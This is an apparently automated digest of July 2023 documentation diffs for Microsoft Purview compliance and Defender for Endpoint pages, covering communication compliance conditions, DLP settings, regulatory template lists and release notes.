-All users assigned to the [Insider Risk Management Investigators](/microsoft-365/compliance/insider-risk-management-plan#plan-for-the-review-and-investigation-workflow) role group are automatically assigned as reviewers in the dedicated communication compliance policy. If inside risk management investigators need to review the associated risky user alert directly on the communication compliance alerts page (linked from the insider risk management alert details), they must be manually added to the *Communication Compliance Investigators* role group.

+All users assigned to the [Insider Risk Management Investigators](/microsoft-365/compliance/insider-risk-management-plan#plan-for-the-review-and-investigation-workflow) role group are automatically assigned as reviewers in the dedicated communication compliance policy. If insider risk management investigators need to review the associated risky user alert directly on the communication compliance alerts page (linked from the insider risk management alert details), they must be manually added to the *Communication Compliance Investigators* role group.

Before integrating communication compliance with insider risk management, you should also consider the following guidance when detecting messages containing potentially inappropriate text:

You have the option of including sensitive information types as part of your com

- Custom information type > [!IMPORTANT]

-> SITs have two different ways of defining the max unique instance count parameters. To learn more, see [Instance count supported values for SIT](/microsoft-365/compliance/create-a-custom-sensitive-information-type#instance-count-supported-values-for-sit).

+> Sensitive info types have two different ways of defining the max unique instance count parameters. To learn more, see [Create custom sensitive information types](/microsoft-365/compliance/create-a-custom-sensitive-information-type#instance-count-supported-values-for-sit).

-To learn more about sensitive information details and the patterns included in the default types, see [Sensitive information type entity definitions](/microsoft-365/compliance/sensitive-information-type-entity-definitions).

+The communication compliance solution supports default sensitive information types as well as bundled named-entity sensitive information types, which are collections of sensitive information types. To learn more about sensitive information details and the patterns included in the default types, see [Sensitive information type entity definitions](/microsoft-365/compliance/sensitive-information-type-entity-definitions). For information on supported bundled named-entity sensitive information types, see the following:

+

+- [All credentials](sit-defn-all-creds.md)

+- [All full names](sit-defn-all-full-names.md)

+- [All medical terms and conditions](sit-defn-all-medical-terms-conditions.md)

+- [All Physical Addresses](sit-defn-all-physical-addresses.md)

### Custom keyword dictionaries

Images from 50 KB to 4 MB in the following image formats are scanned and process

> [!NOTE] > Scanning and extraction for embedded and attached .pdf images is currently supported only for email messages.

-When reviewing pending alerts for policies with OCR enabled, images identified and matched to policy conditions are displayed as child items for associated alerts. You can view the original image to evaluate the identified text in context with the original message. It may take up to 48 hours for detected images to be available with alerts.

+When reviewing pending policy matches for policies with OCR enabled, images identified and matched to policy conditions are displayed as child items for associated alerts. You can view the original image to evaluate the identified text in context with the original message. It may take up to 48 hours for detected images to be available with alerts.

### Conditional settings

The following table explains more about each condition.

|:--|:--| | **Content matches any of these classifiers** | Apply to the policy when any classifiers are included or excluded in a message. Some classifiers are pre-defined in your organization, and custom classifiers must be configured separately before they're available for this condition. Only one classifier can be defined as a condition in a policy. For more information about configuring classifiers, see [Learn about trainable classifiers](/microsoft-365/compliance/classifier-learn-about). | | **Content contains any of these sensitive info types** | Apply to the policy when any sensitive information types are included or excluded in a message. Some classifiers are pre-defined in your tenant, and custom classifiers can be configured separately or as part of the condition assignment process. Each sensitive information type you choose is applied separately and only one of these sensitive information types must apply for the policy to apply to the message. For more information about custom sensitive information types, see [Learn about sensitive information types](/microsoft-365/compliance/sensitive-information-type-learn-about). |

-| **Message is received from any of these domains** **Message is not received from any of these domains** | Apply the policy to include or exclude specific domains in received messages. Make sure to use the following syntax when entering conditional text: -Enter each domain and separate multiple domains with a comma. -Do not include spaces between items separated by a comma. -Remove all leading and trailing spaces. Each domain entered is applied separately, only one domain must apply for the policy to apply to the message. If you want to use **Message is received from any of these domains** to look for messages from specific emails address you need to combine this with another condition like **Message contains any of these words** or **Content matches any of these classifiers** or you might get unexpected results. If you want to scan all email from a specific domain, but want to exclude messages that don't need review (newsletters, announcements, and so on), you must configure a **Message is not received from any of these domains** condition that excludes the email address (example newsletter@contoso.com). |

+| **Message is received from any of these domains** **Message is not received from any of these domains** | Apply the policy to include or exclude specific domains in received messages. Make sure to use the following syntax when entering conditional text: -Enter each domain and separate multiple domains with a comma. -Do not include spaces between items separated by a comma. -Remove all leading and trailing spaces. Each domain entered is applied separately, only one domain must apply for the policy to apply to the message. If you want to use **Message is received from any of these domains** to look for messages from specific domains, you need to combine this with another condition like **Message contains any of these words** or **Content matches any of these classifiers** or you might get unexpected results. If you want to scan all emails but want to exclude messages from a specific domain that don't need review (newsletters, announcements, and so on), you must configure a **Message is not received from any of these domains** condition that excludes the domain (example 'contoso.com,wingtiptoys.com'). |

+| **Message is received from any of these external email addresses** **Message is not received from any of these external email addresses**|Apply the policy to include or exclude messages received or not received from specific external email addresses (example someone@outlook.com). Use this condition to monitor only messages that come from outside the organization (messages that cross the firewall). |

+| **Message is sent to any of these external email addresses** **Message is not sent to any of these external email addresses**|Apply the policy to include or exclude messages sent or not sent to specific external email addresses (example someone@outlook.com). Use this condition to monitor only messages that are sent outside the organization (messages that cross the firewall).|

| **Message is sent to any of these domains** **Message is not sent to any of these domains** | Apply the policy to include or exclude specific domains in sent messages. Make sure to use the following syntax when entering conditional text: -Enter each domain and separate multiple domains with a comma. -Do not include spaces between items separated by a comma. -Remove all leading and trailing spaces. Each domain is applied separately; only one domain must apply for the policy to apply to the message. If you want to exclude all emails sent to two specific domains, configure the **Message is not sent to any of these domains** condition with the two domains (example 'contoso.com,wingtiptoys.com'). | | **Message is classified with any of these labels** **Message is not classified with any of these labels** | To apply the policy when certain retention labels are included or excluded in a message. Retention labels must be configured separately and configured labels are chosen as part of this condition. Each label you choose is applied separately (only one of these labels must apply for the policy to apply to the message). For more information about retention labels, see [Learn about retention policies and retention labels](/microsoft-365/compliance/retention).| | **Message contains any of these words** **Message contains none of these words** | To apply the policy when certain words or phrases are included or excluded in a message. Make sure to use the following syntax when entering conditional text: - Remove all leading and trailing spaces. - Add quotation marks before and after each keyword or key phrase. - Separate each keyword or key phrase with a comma. - Do not include spaces between items separated by a comma. **Example:** "banker","insider trading","confidential 123" Each word or phrase you enter is applied separately (only one word must apply for the policy to apply to the message). For more information about entering words or phrases, see the next section [Matching words and phrases to emails or attachments](#matching-words-and-phrases-to-emails-or-attachments).|

compliance

Communication Compliance

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/communication-compliance.md

f1.keywords:

Previously updated : 04/17/2023 Last updated : 07/18/2023 audience: Admin f1_keywords:

Intelligent customizable templates in communication compliance allow you to appl

Built-in remediation workflows allow you to quickly identify and take action on messages with policy matches in your organization. The following new features increase efficiency for investigation and remediation activities: - **Flexible remediation workflow**: New remediation workflow helps you quickly take action on policy matches, including new options to escalate messages to other reviewers and to send email notifications to users with policy matches.-- **Conversation policy matching**: Messages in conversations are grouped by policy matches to give you more visibility about how conversations relate to your communication policies. For example, conversation policy matching in the *Pending Alerts* view will automatically show all messages in a Teams channel that have matches for your communications policies for analyzing and mitigating potentially inappropriate messages. Other messages in conversations that don't match your communications policies wouldn't be displayed.

+- **Conversation policy matching**: Messages in conversations are grouped by policy matches to give you more visibility about how conversations relate to your communication policies. For example, conversation policy matching in the **Pending** tab will automatically show all messages in a Teams channel that have matches for your communications policies for analyzing and mitigating potentially inappropriate messages. Other messages in conversations that don't match your communications policies wouldn't be displayed.

- **Keyword highlighting**: Terms matching policy conditions are highlighted in the message text view to help reviewers quickly analyze and remediate policy alerts. - **Optical character recognition (OCR)**: Check, detect, and investigate printed and handwritten text within images embedded or attached to email or Microsoft Teams chat messages. - **New filters**: Investigate and remediate policy alerts faster with message filters for several fields, including sender, recipient, date, domains, and many more.

You can choose from the following policy templates in the Microsoft Purview comp

In this step, you can look deeper into the issues detected as matching your communication compliance policies. This step includes the following actions available in the Microsoft Purview compliance portal: -- **Alerts**: When a message matches a policy condition, an alert is automatically generated. For each alert, you can see the status, the severity, the time detected, and if an eDiscovery (Premium) case is assigned and its status. New alerts are displayed on the communication compliance home page and the **Alerts** page and are listed in order of severity.

+- **Alerts**: When a group of messages matches a policy condition, an alert is automatically generated. For each alert, you can see the status, the severity, the time detected, and if an eDiscovery (Premium) case is assigned and its status. New alerts are displayed on the communication compliance home page and the **Alerts** page and are listed in order of severity.

- **Issue management**: For each alert, you can take investigative actions to help remediate the issue detected in the message. - **Document review**: During the investigation of an issue, you can use several views of the message to help properly evaluate the detected issue. The views include a conversation summary, text-only, and detail views of the communication conversation. - **Reviewing user activity history**: View the history of user message activities and remediation actions, such as past notifications and escalations, for policy matches.

In this step, you can look deeper into the issues detected as matching your comm

The next step is to remediate communication compliance issues you've investigated using the following options: -- **Resolve**: After reviewing an issue, you can remediate by resolving the alert. Resolving an alert removes it from the pending alert queue, and the action is preserved as an entry in the *Resolved queue* for the matching policy. Alerts are automatically resolved after marking the alert as misclassified, sending a notice to a user about the alert, or opening a new case for the alert.

+- **Resolve**: After reviewing an issue, you can remediate by resolving the alert. Resolving an alert removes it from the **Pending** tab, and the action is preserved as an entry on the **Resolved** tab for the matching policy. Alerts are automatically resolved after marking the alert as misclassified, sending a notice to a user about the alert, or opening a new case for the alert.

- **Tag a message**: As part of the resolution of an issue, you can tag the detected message as compliant, non-compliant, or as questionable as it relates to the policies and standards for your organization. Tagging can help you micro-filter policy alerts for escalations or as part of other internal review processes. - **Notify the user**: Often, users accidentally or inadvertently violate a communication compliance policy. You can use the notify feature to provide a warning notice to the user and to resolve the issue. - **Escalate to another reviewer**: Sometimes, the initial reviewer of an issue needs input from other reviewers to help resolve the incident. You can easily escalate message issues to reviewers in other areas of your organization as part of the resolution process.

compliance

Compliance Manager Templates List

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/compliance-manager-templates-list.md

f1.keywords:

Previously updated : 05/04/2023 Last updated : 07/18/2023 audience: Admin

The regulatory templates listed below may be purchased by your organization. Cer

- [CIS Implementation Group 1, Group 2, Group 3](/compliance/regulatory/offering-cis-benchmark) - CIS Microsoft 365 Foundation Level 1 and 2 - [Cloud Security Alliance (CSA) Cloud Controls Matrix (CCM)](/compliance/regulatory/offering-csa-star-attestation)-- COBIT 5

+- COBIT 5

- FINRA Cybersecurity Checklist - ITU X.1052 Information Security Management Framework - Joint Commission Information Management Standard

The regulatory templates listed below may be purchased by your organization. Cer

- Bosnia and Herzegovina Law on the Protection of Personal Data - Botswana - Data Protection Act - Bulgaria Law for Protection of Personal Data 2002 -- Central Bank of Kuwait Cybersecurity Framework

+- Central Bank of Kuwait Cybersecurity Framework

+- Corporate Sustainability Reporting Directive (CSRD)

- Cyprus The Processing of Personal Data Law - Czech - Act No. 110/2019 Coll. on Personal Data Processing - 2019 - Czech - On Cyber Security and Change of Related Acts (Act on Cyber Security) - Act No. 181

The regulatory templates listed below may be purchased by your organization. Cer

- Estonia - Personal Data Protection Act - Estonia - The system of security measures for information systems - EU - Directive 2006/24/EC -- EU - ePrivacy Directive 2002 58 EC

+- EU - ePrivacy Directive 2002 58 EC

+- [EU GDPR (General Data Protection Regulation)](/compliance/regulatory/gdpr)

- EudraLex - The Rules Governing Medicinal Products in the European Union - European Network and Information Security Agency (ENISA) - Cloud Computing Information Assurance Framework - Finland - Data Protection Act

compliance

Compliance Manager Whats New

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/compliance-manager-whats-new.md

f1.keywords:

Previously updated : 05/23/2023 Last updated : 07/18/2023 audience: Admin

description: "Find out whatΓÇÖs new in Compliance Manger and whatΓÇÖs to come. R

[!INCLUDE [purview-preview](../includes/purview-preview.md)]

+## June 2023

+

+Compliance Manager has published the following new regulatory template:

+

+- Corporate Sustainability Reporting Directive (CSRD)

+

+View our [full list of regulatory templates](compliance-manager-templates-list.md).

+ ## May 2023 Compliance Manager now integrates with Microsoft Defender for Cloud so you can assess your compliance posture across Microsoft 365, Microsoft Azure, Google Cloud Platform (GCP), and Amazon Web Services (AWS) with resource-level testing and cloud-specific guidance. This new integration provides customers with a single interface in Compliance Manager to help make it easier to manage compliance across the organizationΓÇÖs digital estate. Learn more about [multicloud support in Compliance Manager](compliance-manager-multicloud.md).

compliance

Data Classification Activity Explorer Available Events

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/data-classification-activity-explorer-available-events.md

This event is generated each time an unlabeled document is labeled or an email i

|Source |Reported in Activity explorer | Note | |||| | Word, Excel, PowerPoint|Yes |

-|Outlook| Yes | |

+|Outlook| Yes | If a sensitivity label has been applied to any email in an email thread, the same label will be automatically applied to subsequent replies on the thread. These labeling events appear in activity explorer as automatic labeling events, even when automatic labeling has not ben configured.|

|SharePoint online, OneDrive|Yes | | |Exchange |Yes | | |Azure Information Protection (AIP) unified client and AIP unified scanner |Yes |The AIP *new label* action is mapped to *label applied* in Activity explorer |

compliance

Dlp Exchange Conditions And Actions

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/dlp-exchange-conditions-and-actions.md

To configure the sender address location at a DLP rule level, the parameter is *

|Subject contains words or phrases|condition: *SubjectContainsWords* exception: *ExceptIf SubjectContainsWords*|Words|Messages that have the specified words in the Subject field.| |Subject matches patterns|condition: *SubjectMatchesPatterns* exception: *ExceptIf SubjectMatchesPatterns*|Patterns|Messages where the Subject field contain text patterns that match the specified regular expressions.| |Content contains|condition: *ContentContainsSensitiveInformation* exception *ExceptIfContentContainsSensitiveInformation*|SensitiveInformationTypes|Messages or documents that contain sensitive information as defined by Microsoft Purview Data Loss Prevention (DLP) policies.|

+|Content is not labeled|condition: *ContentIsNotLabeled* exception *ExceptIfContentIsNotLabeled*|Sensitivity Labels|Messages where neither the email nor the attached documents contain any sensitivity labels as defined by Microsoft Purview Data Loss Prevention (DLP) policies.|

|Subject or Body matches pattern|condition: *SubjectOrBodyMatchesPatterns* exception: *ExceptIfSubjectOrBodyMatchesPatterns*|Patterns|Messages where the subject field or message body contains text patterns that match the specified regular expressions.| |Subject or Body contains words|condition: *SubjectOrBodyContainsWords* exception: *ExceptIfSubjectOrBodyContainsWords*|Words|Messages that have the specified words in the subject field or message body|

compliance

Dlp Spo Odbweb Policy Tips

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/dlp-spo-odbweb-policy-tips.md

f1.keywords:

Previously updated : 06/26/2023 Last updated : 07/18/2023 audience: Admin search.appverid: MET150

Yes.

> [!IMPORTANT] > When emails are encrypted with Microsoft Purview Message Encryption and the policy used to detect them uses the detect encryption condition policy tips will not appear.

+For more information on blocking and notifications in SharePoint Online and OneDrive for Business, see [Blocking and notifications in SharePoint Online and OneDrive for Business](dlp-policy-reference.md#blocking-and-notifications-in-sharepoint-online-and-onedrive-for-business).

+ ## Conditions that support policy tips in SharePoint Online and OneDrive for Business web client - Content contains

Yes.

## Actions that support policy tips in SharePoint Online and OneDrive for Business web client -- Restrict acces or encrypt the ocntent in Microsoft 365 locations

+- Restrict acces or encrypt the content in Microsoft 365 locations

## Sensitive information types that support policy tips in SharePoint Online and OneDrive for Business web client

compliance

Endpoint Dlp Learn About

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/endpoint-dlp-learn-about.md

f1.keywords:

Previously updated : 06/24/2023 Last updated : 07/18/2023 audience: ITPro f1_keywords:

Endpoint DLP enables you to audit and manage the following types of activities u

|Activity |Description |Windows 10 1809 and later/ Windows 11| macOS three latest released versions | Auditable/restrictable| |||||| |Upload to cloud service, or access by unallowed browsers | Detects when a user attempts to upload an item to a restricted service domain or access an item through a browser. If they're using a browser that is listed in DLP as unallowed, the upload activity is blocked and the user is redirected to use Microsoft Edge. Microsoft Edge then either allows or blocks the upload or access based on the DLP policy configuration. You can block, warn, or audit when protected files are allowed to be uploaded or prevented from being uploaded to cloud services based on the allow/unallowed domains list in Global settings. When the configured action is set to warn or block, other browsers (defined on the unallowed browsers list under Global settings) are blocked from accessing the file. |Supported |Supported|Auditable and restrictable|

-|Copy to another app |Detects when a user attempts to copy information from a protected item and then paste it into another app, process, or item. It also detects when a user copies and pastes content among files within the same app, process, or item for Word, Excel, and PowerPoint.|Supported|Supported | Auditable and restrictable|

Endpoint DLP enables you to audit and manage the following types of activities u

+|Copy to clipboard| When this activity is detected, you can block, block with override, or audit the copying of protected files to a clipboard on an endpoint device. If the rule is configure to **Block** or **Block with override** copying is blocked when the source content is sensitive except when the destination is within the same Microsoft 365 Office app|Supported | Supported|Auditable and restrictable|

|Access by unallowed apps| Detects when an application that is on the unallowed apps list (as defined in [restricted apps and app groups](dlp-configure-endpoint-settings.md)) attempts to access protected files on an endpoint device. |Supported |Supported|

+### Copy to clipboard behavior

+

+When you configure a rule to **Block** or **Block with override** when a user attempts the Copy to clipboard activity on a file that matches the policy, end users see this behavior with these configurations:

+

+- Word file 123 contains sensitive information that matches the copy to clipboard Block rule.

+- Excel file 123 contains sensitive information that matches the copy to clipboard Block rule.

+- PowerPoint file 123 contains sensitive information that matches the copy to clipboard Block rule.

+

+- Word file 789 doesn't contain sensitive information.

+- Excel file 789 doesn't contain sensitive information.

+- PowerPoint file 789 doesn't contain sensitive information.

+

+- Notepad (or any non Microsoft Office based app or process) file XYZ contains sensitive information that matches the copy to clipboard Block rule.

+- Notepad (or any non Microsoft Office based app or process) file ABC doesn't contain sensitive information.

+

+|Source |Destination |Behavior |

+||||

+|Word file 123/Excel file 123/PowerPoint file 123 |Word file 123/Excel file 123/PowerPoint file 123 |copy and paste are allowed, in other words intra file copy and paste is allowed. |

+|Word file 123/Excel File 123/PowerPoint file 123 |Word file 789/Excel file 789/PowerPoint file 789 |copy and paste are blocked, in other words inter file copy and paste is blocked. |

+|Word file 789/Excel file 789/PowerPoint file 789 |Word file 123/Excel File 123/PowerPoint file 123 |copy and paste are allowed|

+|Word file 123/Excel file 123/PowerPoint file 123 |Notepad file ABC |copy and paste are blocked |

+|Notepad file XYZ | any | copy is blocked|

+|Notepad file ABC | any | copy and paste are allowed|

+ ## Best practice for endpoint DLP policies

-Say you want to block all items that contain credit card numbers from leaving endpoints of Finance department users. We recommend the following:

+Say you want to block all items that contain credit card numbers from leaving endpoints of Finance department users. We recommend:

- Create a policy and scope it to endpoints and to that group of users. - Create a rule in the policy that detects the type of information that you want to protect. In this case, set **content contains** to *Sensitive information type**, and select **Credit Card**.

If the extension is changed only to supported file extensions:

### File types

-File types are a grouping of file formats. They are utilized to protect specific workflows or areas of business. You can use one or more file types as conditions in your DLP policies.

+File types are a grouping of file formats. They're utilized to protect specific workflows or areas of business. You can use one or more file types as conditions in your DLP policies.

Onboarding and offboarding are handled via scripts that you download from the de

Use the procedures in [Getting started with Microsoft 365 Endpoint DLP](endpoint-dlp-getting-started.md) to onboard devices.

-If you have onboarded devices through [Microsoft Defender for Endpoint](../security/defender-endpoint/configure-machines-onboarding.md), those devices will show up automatically in the list of devices. This is because onboarding to Defender also onboards devices to DLP. You only need to **Turn on device monitoring** to use endpoint DLP.

+If you have onboarded devices through [Microsoft Defender for Endpoint](../security/defender-endpoint/configure-machines-onboarding.md), those devices show up automatically in the list of devices. This is because onboarding to Defender also onboards devices to DLP. You only need to **Turn on device monitoring** to use endpoint DLP.

> [!div class="mx-imgBorder"] > ![managed devices list.](../media/endpoint-dlp-learn-about-2-device-list.png)

compliance

Whats New

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/whats-new.md

f1.keywords:

Previously updated : 07/17/2023 Last updated : 07/18/2023 audience: Admin

Whether it be adding new solutions to the [Microsoft Purview compliance portal](

## July 2023

+### Communication compliance

+

+- **Support for advanced sensitive info types**: Communication compliance now [supports four advanced sensitive information types](communication-compliance-policies.md#sensitive-information-types): All credentials, All full names, All medical terms and conditions, and All physical addresses.

+- **New conditions**: [Use the following new conditions to monitor communications that cross the firewall](communication-compliance-policies.md#conditional-settings):

+ - Message is received from any of these external email addresses

+ - Message is not received from any of these external email addresses

+ - Message is sent to any of these external email addresses

+ - Message is not sent to any of these external email addresses

+- **New Policy settings button**: [View policy settings without opening a policy](communication-compliance-investigate-remediate.md).

+- **New Filter bar**: [Key filters (**Body/Subject**, **Date**, **Sender**, and **Tags**) are always displayed](communication-compliance-investigate-remediate.md#using-filters) to make it easier to filter.

+

+### Insider risk management

+

+- **In preview**: [Bring your own detections (BYOD)](import-insider-risk-indicators.md). Use the new BYOD detections feature to import third-party insider risk detections and create custom indicators.

+- **Save a view of a filter in the Activity explorer**: If you create a filter and customize columns for the filter, [save a view of your changes to quickly apply again later](insider-risk-management-activities.md#).

+- **Support for virtualized environments**: Insider risk management now [supports virtualized environments through endpoint DLP](insider-risk-management-settings-policy-indicators.md#enable-device-indicators-and-onboard-windows-devices).

+- **General availability (GA)**:

+ - [Import physical badging data connector](import-physical-badging-data.md)

+ - [Identify priority physical assets setting](insider-risk-management-settings-priority-physical-assets.md)

+- **Additional templates for browser signal detection**: [Browser signal detection is now used for the *Data theft by departing users*, *Data leaks*, and *Risky browser usage (preview)* templates](insider-risk-management-browser-support.md).

+- Update for the [maximum size of a priority user group](insider-risk-management-settings-priority-user-groups.md#create-a-priority-user-group).

+ ### Sensitivity labels - **General availability (GA)**: [Support for administrative units](get-started-with-sensitivity-labels.md#support-for-administrative-units).

Whether it be adding new solutions to the [Microsoft Purview compliance portal](

## June 2023

+### Communication compliance

+

+- Update to note that for the *Export* option in detailed reports, [the items and actions displayed are only for the items and actions matched during the date range included in the date range filter](communication-compliance-reports-audits.md#detailed-reports).

+ ### Compliance Manager - Update to clarify that some [automatically tested actions](compliance-manager-improvement-actions.md#testing-work) might show a status of "Out of scope" within the first 24 hours of setup with Microsoft Defender for Cloud monitoring.

includes

Defender M3d Techcommunity

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/includes/defender-m3d-techcommunity.md

> [!TIP]

-> Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: [Microsoft 365 Defender Tech Community](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/bg-p/MicrosoftThreatProtectionBlog).

+> Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: [Microsoft 365 Defender Tech Community](https://techcommunity.microsoft.com/t5/microsoft-365-defender/bd-p/MicrosoftThreatProtection).

includes

Defender Mde Techcommunity

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/includes/defender-mde-techcommunity.md

+

+ Title: Microsoft Defender for Endpoint tech community

+description: Microsoft 365 Defender tech community engagement.

Last updated : 07/21/2023++++++++

+> [!TIP]

+> Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: [Microsoft Defender for Endpoint Tech Community](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/bd-p/MicrosoftDefenderATP).

security

Get Agent Details

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/Get-agent-details.md

GET https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanAgents/7

} ```

security

Get Scan History By Definition

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/Get-scan-history-by-definition.md

POST https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinit

} ```

security

Get Scan History By Session

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/Get-scan-history-by-session.md

POST https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinit

] } ```

security

Access Mssp Portal

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/access-mssp-portal.md

Use the following steps to obtain the MSSP customer tenant ID and then use the I

- [Grant MSSP access to the portal](grant-mssp-access.md) - [Configure alert notifications](configure-mssp-notifications.md) - [Fetch alerts from customer tenant](fetch-alerts-mssp.md)

security

Add A New Scan Definition

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/add-a-new-scan-definition.md

POST https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinit

"ScanDefinitionIds": ["td32f17af-5cc2-4e4e-964a-4c4ef7d216e2", "ab32g20af-5dd2-4a5e-954a-4c4ef7d216e2"], } ```

security

Add Or Remove Machine Tags

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/add-or-remove-machine-tags.md

POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2

``` To remove machine tag, set the Action to 'Remove' instead of 'Add' in the request body.

security

Add Or Remove Multiple Machine Tags

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/add-or-remove-multiple-machine-tags.md

POST https://api.securitycenter.microsoft.com/api/machines/AddOrRemoveTagForMult

``` To remove machine tags, set the Action to 'Remove' instead of 'Add' in the request body.

security

Admin Submissions Mde

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/admin-submissions-mde.md

The submission is available on the **Files** tab of the **Submissions** page at

- [Microsoft Defender for Endpoint in Microsoft 365 Defender](../defender/microsoft-365-security-center-mde.md) - [Address false positives/negatives](defender-endpoint-false-positives-negatives.md) - [View and organize alerts queue in Microsoft Defender for Endpoint](alerts-queue.md)

security

Advanced Features

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/advanced-features.md

Backup quarantined files in a secure and compliant location so they can be downl

- [Update data retention settings](data-retention-settings.md) - [Configure alert notifications](configure-email-notifications.md)

security

Alerts Queue Endpoint Detection Response

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/alerts-queue-endpoint-detection-response.md

Topic|Description

[Investigate an IP address](investigate-ip.md)|Examine possible communication between devices in your network and external internet protocol (IP) addresses. [Investigate a domain](investigate-domain.md)|Investigate a domain to see if devices and servers in your network have been communicating with a known malicious domain. [Investigate a user account](investigate-user.md)|Identify user accounts with the most active alerts and investigate cases of potential compromised credentials.

security

Alerts Queue

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/alerts-queue.md

You can choose to filter the alerts based on their Automated investigation state

- [Investigate an IP address associated with a Microsoft Defender for Endpoint alert](investigate-ip.md) - [Investigate a domain associated with a Microsoft Defender for Endpoint alert](investigate-domain.md) - [Investigate a user account in Microsoft Defender for Endpoint](investigate-user.md)

security

Alerts

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/alerts.md

GET https://api.securitycenter.microsoft.com/api/alerts/da637472900382838869_136

## Related articles [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview)

security

Analyzer Feedback

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/analyzer-feedback.md

If you have feedback or suggestions that would help us improve the Microsoft Def

2. Microsoft 365 Defender portal (security.microsoft.com): :::image type="content" source="images/1d5b3c010b4b5c0e9d5eb43f71fa95e3.png" alt-text="The Give feedback button" lightbox="images/1d5b3c010b4b5c0e9d5eb43f71fa95e3.png":::

security

Analyzer Report

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/analyzer-report.md

To include analyzer result files [when opening a support ticket](contact-support

> [!NOTE] > If the file size is larger than 25 MB, the support engineer assigned to your case will provide a dedicated secure workspace to upload large files for analysis.

security

Android Configure Mam

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/android-configure-mam.md

Use the following steps to configure the Disable sign out:

- [Deploy Microsoft Defender for Endpoint on Android with Microsoft Intune](android-intune.md)

security

Android Configure

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/android-configure.md

Use the following steps to configure Disable sign-out:

- [Overview of Microsoft Defender for Endpoint on Android](microsoft-defender-endpoint-android.md) - [Deploy Microsoft Defender for Endpoint on Android with Microsoft Intune](android-intune.md)

security

Android Intune

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/android-intune.md

Organizations can communicate to their users to protect Personal profile with Mi

- [Overview of Microsoft Defender for Endpoint on Android](microsoft-defender-endpoint-android.md) - [Configure Microsoft Defender for Endpoint on Android features](android-configure.md)

security

Android Privacy

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/android-privacy.md

Optional data includes diagnostic data and feedback data. Optional diagnostic da

- The user's email address, if they choose to provide it. - Feedback type (smile, frown, idea) and any feedback comments submitted by the user.

security

Android Support Signin

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/android-support-signin.md

If a user faces an issue, which isn't already addressed in the above sections or

:::image type="content" source="images/finalsubmit5.png" alt-text="The pane on which you can add details and attach diagnostic data" lightbox="images/finalsubmit5.png"::: 6. Click on "Submit" to successfully send the feedback.

security

Android Whatsnew

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/android-whatsnew.md

Notify your users and helpdesk (as applicable) that users will need to accept th

> [!NOTE] > This permission allows Microsoft Defender for Endpoint to access storage on user's device, which helps detect and remove malicious and unwanted apps. Microsoft Defender for Endpoint accesses/scans Android app package file (.apk) only. On devices with a Work Profile, Defender for Endpoint only scans work-related files.

security

Api Explorer

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api-explorer.md

Credentials to access an API aren't needed. The API Explorer uses the Defender f

The logged-in user authentication credential is used to verify that the API Explorer is authorized to access data on your behalf. Specific API requests are limited based on your RBAC privileges. For example, a request to "Submit indicator" is limited to the security admin role.

security

Api Hello World

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api-hello-world.md

You're all done! You have just successfully:

- [Microsoft Defender for Endpoint APIs](exposed-apis-list.md) - [Access Microsoft Defender for Endpoint with application context](exposed-apis-create-app-webapp.md) - [Access Microsoft Defender for Endpoint with user context](exposed-apis-create-app-nativeapp.md)

security

Api Microsoft Flow

